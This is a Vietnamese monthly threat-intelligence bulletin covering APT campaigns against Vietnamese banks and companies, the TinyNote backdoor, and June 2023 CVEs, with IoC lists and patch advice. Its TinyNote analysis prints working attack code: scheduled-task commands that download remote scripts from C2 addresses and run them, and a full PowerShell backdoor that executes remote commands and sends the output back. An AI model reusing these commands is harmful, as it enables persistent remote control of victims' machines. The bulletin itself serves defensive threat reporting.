Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết
1 Các mối đe dọa nâng cao – Advanced Threats
1.1 Chiến dịch tấn công nhắm đến người dùng ngân hàng ở Việt Nam sử dụng mẫu mã độc Android mới HelloTeacher
Đội ngũ Cyble Research & Intelligence Labs (CRIL) đã phát hiện 1 mẫu Android Spyware mới nhắm đến các người dùng ngân hàng ở Việt Nam. Mẫu malware này được đặt tên “HelloTeacher” dựa trên test service có trong mã nguồn của mẫu.
Mã độc HelloTeacher giả dạng thành 1 ứng dụng nhắn tin phổ biến như Viber hay Kik Messenger, nhằm mục đích dễ dàng lừa người dùng cài đặt ứng dụng. Mã độc được trang bị các tính năng để lấy cắp các thông tin từ máy nạn nhân bao gồm danh sách liên lạc, dữ liệu SMS, hình ảnh, danh sách ứng dụng cài đặt, thậm chí chụp hình và ghi lại màn hình thiết bị.
Ngoài ra, nhóm tấn công đứng đằng sau HelloTeacher còn cố gắng sử dụng mã độc như 1 banking trojan thông qua sử dụng 1 Accessibility Service. Các ngân hàng là mục tiêu bị nhắm đến chính của nhóm tấn công bao gồm:
Package name | Banking Application name |
com.tpb.mb.gprsandroid | TPBank Mobile |
com.mbmobile | MB Bank |
com.vietinbank.ipay | VietinBank iPay |
Các chuyên gia phân tích phát hiện trong mã độc có những đoạn code được thiết kế để lấy các thông tin tài khoản từ ứng dụng “TPBank Mobile”. Ngoài ra 1 module khác chưa hoàn thiện nhằm mục đích chèn thêm các giá trị vào trong các trường text trong ứng dụng MB Bank. Việc phát hiện 1 module chưa hoàn thiện chỉ ra rằng mẫu mã độc này vẫn sẽ được phát triển thêm các tính năng mới trong tương lai.
Quá trình phân tích cũng phát hiện 1 số chuỗi strings theo ngôn ngữ tiếng Trung có trong code của mã độc, được sử dụng cho mục đích logging và kết nối C&C.
MITRE ATT&CK
Tactic | Technique ID | Technique Name |
Initial Access | T1476 | Deliver Malicious App via Other Means. |
Initial Access | T1444 | Masquerade as a Legitimate Application |
Collection | T1432 | Access Contact List |
Collection | T1412 | Capture SMS Messages |
Collection | T1512 | Capture Camera |
Collection | T1513 | Screen Capture |
Collection | T1533 | Data from Local System |
Discovery | T1418 | Application discovery |
Indicators of Compromise (IoCs)
Indicators | Indicator Type | Description |
00c614ce1a21b1339133240403617e9edc9f2afc9df45bfa7de9def31be0930e | SHA256 | Hash of analyzed APK |
f1e674e58cd60b634febd0be0da38fee7fd40a5c | SHA1 | Hash of analyzed APK |
43162a1c5494d6c84d940beaa7dbd507 | MD5 | Hash of analyzed APK |
hxxp://api[.]sixmiss.com | URL | C&C server |
d0dc26b3485b7e40ec400f681d39767042d30ae50f6f47340adc971cce7fba50 | SHA256 | Hash of analyzed APK |
ba20865f51d46f2bd25a3e6b9f11b26e220ed7ee | SHA1 | Hash of analyzed APK |
b6fa402a0d0fab1dabeb3c90cd8847f9 | MD5 | Hash of analyzed APK |
7c634665f5f2c3b837d7211bf92c095e7e1d6cd3aa4cb86ca75def4146b14ea6 | SHA256 | Hash of analyzed APK |
a8fe89c844699ea2aaba87afd9919907c17ac199 | SHA1 | Hash of analyzed APK |
5b0d2fc2107fd18a0cb125b4997e2d10 | MD5 | Hash of analyzed APK |
hxxp://api[.]viberrx.com | URL | C&C server |
1.2 Phân tích nhóm tấn công XeGroup có nguồn gốc từ Việt Nam
XeGroup là 1 nhóm tấn công được cho là đã hoạt động từ năm 2013, tham gia vào nhiều hoạt động tội phạm mạng khác nhau với các kĩ thuật tấn công khác nhau như:
- Các cuộc tấn công supply chain, nhằm mục đích inject các bộ quét credit card vào các trang web bị nhóm tấn công
- Sử dụng các website giả mạo để lừa người dùng cung cấp các thông tin cá nhân
- Buôn bán dữ liệu trên Dark web
1 báo cáo được cung cấp trước đây bởi Volexity cho thấy nhóm này đã đánh cắp hơn $30 triệu USD từ các tổ chức, tập đoàn của Mỹ, tấn công nhiều website và ứng dụng di động đề chèn thêm các đoạn mã độc hại nhằm đánh cắp dữ liệu thanh toán và thẻ của khách hàng. 1 bản khuyến nghị gần đây từ CISA cho thấy 1 cuộc tấn công của nhóm khai thác lỗ hổng CVE-2019-18935 trên Telerik nhắm đến 1 máy chủ IIS của 1 tổ chức chính phủ của Mỹ.
Đội ngũ Threat Intel của Menlo Labs đã tiến hành phân tích các mẫu tấn công cũng như cơ sở hạ tầng mạng của nhóm và nhận thấy nhóm tấn công khả năng cao có nguồn gốc từ Việt Nam, hoạt động dưới tên “XeThanh” và/hoặc “XeGroup”.
Phân tích file .exe được nhóm sử dụng cho thấy những file này tạo 1 file .aspx tại đường dẫn C:\Windows\Temp và thực thi file để tạo 1 reverse shell kết nối đến XeGroups[.]com.
1 webshell khác cũng được nhóm sử dụng lại có chứa các chuỗi string được hard-coded trong User-Agent. Chuỗi string này được hard-coded dưới dạng base64 encoded, khi giải mã ra là “XeThanh|XeGroups”.
Menlo Labs tiến hành phân tích các hoạt động liên quan đến credit card skimming của nhóm và nhận thấy domain “XeGroups[.]com” cũng được sử dụng trong nameserver.
Tiếp đến, đội ngũ nghiên cứu tiến hành phân tích cơ sở hạ tầng mạng mà nhóm sử dụng, kết hợp với việc thu thập, tổng hợp thông tin từ các nguồn OSINT đã cho thấy 1 cá nhân có tên “Nguyen Huu Tai”, hay các tên khác là “Joe Nguyen”/”Thanh Nguyen” có liên quan đến XeGroup.
Indicators of Compromise (IoCs)
Compromise website
hxxps[://]www.emergencylighting[.]com/
hxxps[://]www.meiersupply[.]com/
hxxps[://]www.onehundred80degrees[.]com/
Testing binary by xethanh
dfab1097f7d345cad468a5e94d03e41701c602898bb9685457f327db3158dfc7
2010 sample
5395ef75d7a6325306f186ec636edc65191e82fd6ca705c58e4355c9498bca4a
2014 sample
02c48917b15015ddd02738bc1f480f9c6379165618435855030f4c63ce372485
ASPXSPY Hashes
Ba2109b5a3ccebbc494ee93880b55640539c7d25b85bc12189f0c671ce473771
884c394c7b3eb757ae57050ac2e6a75385a361555e8e4272de1a3cf24746eec7
Testing network infrastructure
repo.hyperstruct[.]net/mozrepl/1.0/mozrepl.xpi
Threat Actor Infrastructure
184.168.104.171
Skimmer Infrastructure
hivnd[.]com
xegroups[.]com
Xework[.]com
Object[.]fm
paycashs[.]com
xeadult[.]com
1.3 Chiến dịch tấn công các công ty ở Việt Nam sử dụng mẫu mã độc SPECTRALVIPER
Đội ngũ Elastic Security Labs đã theo dõi và phát hiện 1 chiến dịch tấn công nhắm đến các công ty ở Việt Nam trong những tháng vừa qua, được đặt tên là REF2754. Các chuyên gia cũng phát hiện SPECTRALVIPER, 1 mẫu mã độc mới, được sử dụng trong chiến dịch này.
Execution flow
Dấu hiệu tấn công đầu tiên được ghi nhận là việc tạo 1 file mới (C:\Users\Public\Libraries\dbg.config) bởi System service qua SMB từ 1 endpoint đã bị chiếm quyền trong hệ thống. Sau đó, nhóm tấn công thực hiện đổi tên công cụ ProcDump của SysInternals thành Windbg.exe, giả mạo công cụ Windows debugger. Công cụ này sau khi đổi tên được thực thi với flag “-md” nhằm gọi đến dbg.config là 1 DLL chứa các đoạn mã độc.
Dbg.config có chứa DONUTLOADER shellcode nhằm mục đích inject vào tiến trình sessionmsg.exe của Microsoft Remote Session Message Server. DONUTLOADER được cấu hình để tải SPECTRALVIPER backdoor, sau đó là 1 trong 2 họ malware P8LOADER hoặc POWERSEAL.
Đội ngũ Elastic cũng ghi nhận các cuộc tấn công khác với luồng tấn công tương tự, nhưng có sử dụng 1 tiến trình khác (ExtExport.exe) để load file dll, hoặc sử dụng kĩ thuật DLL side-loading sử dụng nslookup.exe để load file dll độc hại (dnsapi.dll).
Quá trình phân tích SPECTRALVIPER cho thấy mẫu này bao gồm các tính năng như proces loading/injection, giả mạo token (token impersonation) và điều khiển file (file manipulation). Mã độc sử dụng các kênh kết nối (HTTP và named pipe) được mã hóa bằng mã hóa AES và Diffie-Hellman hoặc trao đổi key RSA1024. Các mẫu thu được đều được xáo trộn (obfuscated) rất nhiều, sử dụng chung 1 bộ obfuscator với các mức độ hardening khác nhau.
Trong khi đó, P8LOADER là 1 mẫu Windows PE loader cho phép kẻ tấn công giảm thiểu và gây xáo trộn phần logging trên máy nạn nhân, và POWERSEAL là 1 mẫu Powershell runner có các thành phần giúp bypass ETW và AMSI khi sử dụng các công cụ Powershell.
Victimology
1 trong những nạn nhân của REF2754 được Elastic ghi nhận là 1 công ty lớn ở Việt Nam chuyên về kinh doanh nông nghiệp. Sử dụng SPECTRALVIPER Yara signature, các chuyên gia phát hiện thêm các nạn nhân khác cũng là các công ty lớn, hoạt động chủ yếu ở Việt Nam.
Phân tích chiến dịch REF2754 và sự tương đồng với REF4322 cũng được đội ngũ Elastic phát hiện năm 2022, các chuyên gia nghiên cứu nhận thấy các hoạt động tấn công này có mối liên quan đến nhóm APT32 (OCEANLOTUS).
Indicators of Compromise (IoCs)
Observable | Type | Name | Reference |
56d2d05988b6c23232b013b38c49b7a9143c6649d81321e542d19ae46f4a4204 | SHA-256 | – | SPECTRALVIPER Related to 1.dll below |
d1c32176b46ce171dbce46493eb3c5312db134b0a3cfa266071555c704e6cff8 | SHA-256 | 1.dll | SPECTRALVIPER |
7e35ba39c2c77775b0394712f89679308d1a4577b6e5d0387835ac6c06e556cb | SHA-256 | asdgb.exe | SPECTRALVIPER |
4e3a88cf00e0b4718e7317a37297a185ff35003192e5832f5cf3020c4fc45966 | SHA-256 | Settings.db | SPECTRALVIPER |
7b5e56443812eed76a94077763c46949d1e49cd7de79cde029f1984e0d970644 | SHA-256 | Microsoft.MicrosoftEdge_8wekyb3d8bbwe.pkg | SPECTRALVIPER |
5191fe222010ba7eb589e2ff8771c3a75ea7c7ffc00f0ba3f7d716f12010dd96 | SHA-256 | UpdateConfig.json | SPECTRALVIPER |
4775fc861bc2685ff5ca43535ec346495549a69891f2bf45b1fcd85a0c1f57f7 | SHA-256 | Microsoft.OneDriveUpdatePackage.mca | SPECTRALVIPER |
2482c7ececb23225e090af08feabc8dec8d23fe993306cb1a1f84142b051b621 | SHA-256 | ms-certificates.sst | SPECTRALVIPER |
stablewindowsapp[.]com | Domain | n/a | C2 |
webmanufacturers[.]com | Domain | n/a | C2 |
toppaperservices[.]com | Domain | n/a | C2 |
hosting-wordpress-services[.]com | Domain | n/a | C2 |
appointmentmedia[.]com | Domain | n/a | C2 |
2 Malware
2.1 Phân tích TinyNote – mã độc sử dụng bởi nhóm tấn công Camaron Dragon
Các nhà nghiên cứu của CheckPoint gần đây công bố bài phân tích mẫu backdoor mới được Camaron Dragon sử dụng có tên TinyNote. Nhóm tấn công Camaro Dragon được cho là liên kết với với mạng lưới gián điệp mạng, các hoạt động của nhóm tấn công được cho là trùng lặp với hoạt động đã được mô tả trong các báo cáo trước liên quan đến các nhóm tấn công được bảo trợ bởi chính phủ Trung Quốc.
Backdoor TinyNote được phát triển bằng ngôn ngữ golang, được phát tán với các tên liên quan đến các vấn đề đối ngoại và có khả năng nhắm mục tiêu vào các đại sứ quán Đông Nam Á và Đông Á. TinyNote là một mã độc dạng remote shell với một số tính năng như thiết lập persistence, thực thi lệnh từ máy chủ C2, bypass phần mềm AV.
Khi bắt đầu thực thi, mã độc bắt đầu với một hàm có tên “bypassSMADAV“. SMADAV là một ứng dụng AV của Indonesia, được dùng nhiều ở người dân Indonesia, một số khác ở các quốc gia Đông Nam Á và Châu Phi. Sau quá trình bypass, mã độc tạo một mutex có tên “NASA&USA” và tiếp tục thực thi mã độc theo 1 trong 2 chế độ:
Chế độ đầu tiên: thiết lập persistence, mã độc Powershell và cài đặt mã độc
Mã độc sẽ kiểm tra chuỗi “zip” trong đường dẫn, nếu không có chuỗi này mã độc tiếp tục thực thi. TinyNote tạo thư mục tại đường dẫn c:\programdata\Robots, nếu tạo thư mục không thành công, mã độc sẽ không tiếp tục thực thi, có thể là nạn nhân chỉ có các đặc quyền thấp.
Tạo 2 scheduled tasks có tên test và test2 để thực thi các lệnh PowerShell
schtasks /Create /TN test /SC MINUTE /MO 15 /TR "powershell \"$r=[System.Net.WebRequest]::Create(\\\"http://5.188.33.190/Robots.txt\\\");(new-object System.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -noprofile -\"" /f
schtasks /Create /TN test2 /SC MINUTE /MO 45 /TR "powershell \"$r=[System.Net.WebRequest]::Create(\\\"http://103.159.132.91/Robots.txt\\\");(new-object System.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -noprofile -\"" /f
C:\Windows\System32\cmd.exe /c "start powershell.exe -nop -c set-alias exi iex;`$v1='iex (new-object net.webclient).dow';`$v2='nloadstring(''http://';`$v3='103.159.132.91/robots1.txt'')';exi(`$v1+`$v2+`$v3);"
Payload cuối là backdoor Powershell, nhận command từ C2 server, thực thi với Invoke-Expression, nối output với chuỗi ‘_n1w_’ và gửi lại kết quả trở lại máy chủ trong POST request
$WindowState = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int stat);';add-type -name win -member $WindowState -namespace native;[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
$url="http://103.159.132.91:8081/";
$postParams = 'result=start';
while (1 -eq 1) {
try {
$data = [System.Text.Encoding]::UTF8.GetBytes($postParams);
$req = [System.Net.WebRequest]::Create($url);
$req.ServicePoint.ConnectionLimit =65535;
If ($req.ServicePoint.CurrentConnections -ge 10000) {
$req.ServicePoint.CloseConnectionGroup("")
}
$req.ServicePoint.Expect100Continue = $false;
#$req.Timeout = 10000;
$req.Method = "POST";
$req.ContentType = "application/x-www-form-urlencoded";
$req.ContentLength = $data.Length;
$Stream = $req.GetRequestStream();
$Stream.Write($data, 0, $data.Length);$Stream.Flush();$Stream.Close();
#waiting remote
[System.Net.WebResponse] $resp = $req.GetResponse();$header=$resp.GetResponseHeader('CMD');
$d = [System.Convert]::FromBase64String($header);
$Ds = [System.Text.Encoding]::UTF8.GetString($d);$result = "";
Foreach ($string in invoke-expression $Ds){$result=$result+'_n1w_'+$string;};
$result = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($result));
$postParams = "result=$result";
}
catch{};
};
Mã độc tự sao chép bản thân vào tệp zip có định dạng “[16 random characters].zip” trong đường dẫn “c:\users\public\” và tạo thêm một bản sao khác tại đường dẫn có định dạng c:\users\public\[16 random characters].zip\. Sau đó, tạo một lập lịch nhằm thực thi bản sao của mã độc từ đường dẫn ngẫu nhiên:
schtasks /Create /TN <random.zip> /SC MINUTE /MO 15 /TR “explorer.exe c:\users\public\<random.zip>\<filename>.exe” /f
Chế độ thứ hai: backdoor
Chế độ này được thực hiện sau khi phần mềm độc hại đã tồn tại trong máy nạn nhân từ lâu và thực thi từ đường dẫn có chuỗi “zip”. Mã độc thực hiện liệt kê thông tin hệ thống theo các thông tin sau và nối thành một chuỗi, các thông tin bao gồm:
- Tên người dùng hệ thống hiện tại
- Thư mục của người dùng
- Thông tin network interfaces (tên, MacAddress, mô tả)
Thực hiện mã hóa chuỗi thông tin trên bằng thuật toán XOR với khóa “NASA” và base64. Gửi GET request tới URL được chọn ngẫu nhiên trong 3 URL sau:
- http://5.188.33.190/api.php
- http://103.169.90.132/api.php
- http://103.159.132.91/api.php
User-agent cũng được chọn ngẫu nhiên từ các user-agent sau:
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
- Mozilla/5.0 (iPhone; CPU iPhone OS 12_0_1 như Mac OS X) AppleWebKit/605.1.15 (KHTML, như Gecko) Version/12.0 Mobile/15E148 Safari/604.1
- Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, như Gecko) Chrome/104.0.0.0 Safari/537.36
Máy chủ C2 gửi lại kết quả theo cấu trúc sau: {“msg”:”[BASE64-ENCODED COMMAND]”}
Sau quá trình giải mã reponse từ C2, malware sẽ tạo một Goroutine nhằm thực thi command và tiếp tục lắng nghe các commands khác từ C2.
Indicators of Compromise (IoCs)
f0b081ca58b6c253aa0014847c62dbad
6a2204b32a60aed0a3403c63ad2a529c
5.188.33[.]190
103.169.90[.]132
103.159.132[.]91
23.106.123[.]59
3 CVE và các khuyến nghị bảo mật
3.1 Microsoft Patch Tuesday – June 2023
Trong tháng 6, Microsoft đã phát hành các bản vá cho 69 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Office và Office Components; Microsoft Edge (Chromium-based); SharePoint Server; .NET và Visual Studio; Microsoft Teams; Azure DevOps; Microsoft Dynamics; và Remote Desktop Client. Trong đó có 6 lỗ hổng được đánh giá mức độ Nghiêm trọng, 62 lỗ hổng được đánh giá là Important. Dưới đây là các CVE nổi bật:
3.1.1 CVE-2023-32031– Microsoft Exchange Server Remote Code Execution Vulnerability.
CVSS: 8.8/10
Mô tả: Microsoft Exchange Server là hệ thống máy chủ mail được sử dụng phổ biến trong các doanh nghiệp/đơn vị. Exchange Server tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa bằng quyền SYSTEM trên hệ thống bị ảnh hưởng. Quá trình khai thác lỗ hổng yêu cầu xác thực.
Phiên bản ảnh hưởng:
Microsoft Exchange Server 2019 Cumulative Update 13
Microsoft Exchange Server 2016 Cumulative Update 23
Microsoft Exchange Server 2019 Cumulative Update 12
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-32031
3.1.2 CVE-2023-29357 – Microsoft SharePoint Server Elevation of Privilege Vulnerability.
CVSS: 9.8/10
Mô tả: Microsoft Sharepoint Server tồn tại lỗ hổng cho phép kẻ tấn công leo thang đặc quyền, khai thác thành công lỗ hổng cho phép thực thi câu lệnh bằng quyền administrator. Lỗ hổng này được kết hợp với lỗ hổng có định danh CVE-2023-24955 – RCE tạo thành bugchain
Phiên bản ảnh hưởng:
Microsoft SharePoint Server 2019
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357.
3.1.3 CVE-2023-29363/32014/32015 – Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability.
CVSS: 9.8/10
Mô tả: Pragmatic General Multicast (PGM) là một giao thức truyền dữ liệu tin cậy cho phép người nhận phát hiện mất mát dữ liệu, yêu cầu truyền lại dữ liệu khi mất. PGM được triển khai trên môi trường Windows và chỉ hỗ trợ khi Microsoft Message Queuing (MSMQ) phiên bản 3.0 được cài đặt.
Tồn tại lỗ hổng trong PGM cho phép kẻ tấn công không cần xác thực thực thi mã từ xa bằng việc sử dụng file độc hại gửi qua mạng trên môi trường Pragmatic General Multicast (PGM) Server chạy dịch vụ Microsoft Message Queuing (MSMQ)
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29363 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-32014 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-32015
3.2 Ứng Dụng Web Và Các Sản Phẩm Khác
3.2.1 CVE-2023-34362 – MOVEit Transfer SQL Injection / Remote Code Execution.
CVSS: 9.8/10
Mô tả: Tồn tại lỗ hổng SQL Injection trong ứng dụng web MOVEit Transfer cho phép kẻ tấn công không cần xác thực có quyền truy cập vào cơ sở dữ liệu của MOVEit Transfer, từ đó thực thi các câu lệnh SQL làm thay đổi, thêm, sửa, xóa cơ sở dữ liệu
Phiên bản ảnh hưởng:
Progress MOVEit Transfer trước phiên bản 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), và 2023.0.1 (15.0.1)
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023
3.2.2 CVE-2023-27997 – FortiOS & FortiProxy – Heap buffer overflow in sslvpn pre-authentication.
CVSS: 9.2/10
Mô tả: Tồn tại lỗ hổng tràn bộ đệm trên heap (heap-based buffer overflow) cho phép kẻ tấn công thực thi mã từ xa.
Phiên bản ảnh hưởng:
FortiOS-6K7K version 7.0.10
FortiOS-6K7K version 7.0.5
FortiOS-6K7K version 6.4.12
FortiOS-6K7K version 6.4.10
FortiOS-6K7K version 6.4.8
FortiOS-6K7K version 6.4.6
FortiOS-6K7K version 6.4.2
FortiOS-6K7K version 6.2.9 through 6.2.13
FortiOS-6K7K version 6.2.6 through 6.2.7
FortiOS-6K7K version 6.2.4
FortiOS-6K7K version 6.0.12 through 6.0.16
FortiOS-6K7K version 6.0.10
FortiProxy version 7.2.0 through 7.2.3
FortiProxy version 7.0.0 through 7.0.9
FortiProxy version 2.0.0 through 2.0.12
FortiProxy 1.2 all versions
FortiProxy 1.1 all versions
FortiOS version 7.2.0 through 7.2.4
FortiOS version 7.0.0 through 7.0.11
FortiOS version 6.4.0 through 6.4.12
FortiOS version 6.2.0 through 6.2.13
FortiOS version 6.0.0 through 6.0.16
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://www.fortiguard.com/psirt/FG-IR-23-097